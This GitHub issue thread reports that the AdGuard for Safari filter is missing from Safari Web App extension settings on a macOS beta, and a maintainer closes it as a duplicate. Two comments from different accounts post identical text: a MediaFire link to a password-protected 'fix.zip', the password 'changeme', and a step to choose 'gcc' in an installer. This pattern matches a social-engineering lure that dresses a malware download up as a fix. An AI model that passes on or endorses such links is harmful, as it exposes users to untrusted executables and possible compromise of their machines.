### ISSUE TITLE
Safari Web Apps (Adguard for Safari filter not enabled)

### ISSUE THREAD

**Issue by spookydracula** [AdguardTeam/AdGuardForSafari#1014]
### Please answer the following questions for yourself before submitting an issue.

- [X] I am running the latest version
- [X] I made sure all content blockers are enabled in Safari settings
- [X] I checked the documentation and found no answer
- [X] I checked to make sure that this issue has not already been filed

### AdGuard version

1.11.18

### Environment

```markdown
- OS: macOS Sequoia 15 Beta 7
- Safari version: Safari 18 Beta 7
```

### What filters do you have enabled?

AdGuard Base filter, AdGuard Mobile Ads filter, AdGuard URL Tracking filter, AdGuard Social Media filter, AdGuard Annoyances filter, AdGuard Cookie Notices filter, AdGuard Popups filter, AdGuard Mobile App Banners filter, AdGuard Widgets filter, AdGuard Other Annoyances filter, AdGuard DNS filter

### Issue Details

Steps to reproduce:
1. In Safari, go to YouTube.com
2. In menubar, select File: Add to Dock...
3. Open YouTube webapp
4. In menubar, select File: Settings...
5. In Settings pane, select Extensions tab
6. "Adguard for Safari" filter is not listed while the other Adguard filters are... (General, Custom, Other, Privacy, Security and Social)

### Expected Behavior

With Safari WebApps now supporting extensions, it's expected for all of the Adguard for Safari filters to show up.

### Actual Behavior

All filters show up and are enabled (General, Custom, Other, Privacy, Security and Social) except for the base "Adguard for Safari" filter, preventing blocking ads on YouTube.

### Screenshots

<details><summary>Screenshot 1:</summary>

</details>
<img width="774" alt="Screenshot 2024-08-26 at 5 16 14 AM" src="https://github.com/user-attachments/assets/c53a697c-2ba8-41ea-8e07-d0dd3093a653">

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexx7311** [comment]
@spookydracula, hello! We're happy that Web Apps finally have support for extensions.
We'll take a look into it, thanks!
Closing as a dup. of https://github.com/AdguardTeam/AdGuardForSafari/issues/872
